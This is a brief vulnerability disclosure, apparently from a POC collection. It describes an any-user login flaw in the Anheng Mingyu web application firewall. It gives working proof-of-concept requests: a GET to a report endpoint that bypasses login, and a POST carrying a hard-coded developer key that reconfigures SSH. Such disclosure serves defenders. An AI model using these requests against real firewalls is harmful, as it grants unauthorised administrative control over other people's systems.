Anheng Mingyu Web Application Firewall Report Php Any User Login Vulnerability
Anheng Mingyu Web Application Firewall Report Php Any User Login Vulnerability
Anheng Mingyu WEB application firewall report.php Any user login vulnerability
Vulnerability Description
Anheng Mingyu WEB application firewall report.php file has hard-coded settings for Console user login. Attackers can log in directly into the background through vulnerabilities.
Vulnerability Impact
Anheng Mingyu WEB application firewall
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/report.m?a=rpc-timed
Then visit the main page to jump to the configuration page
Send request packets to configure system SSH, etc.
1
2
3
POST /system.m?a=reserved
key=!@#dbapp-waf-dev-reserved#@!
This post is licensed under CC BY 4.0 by the author.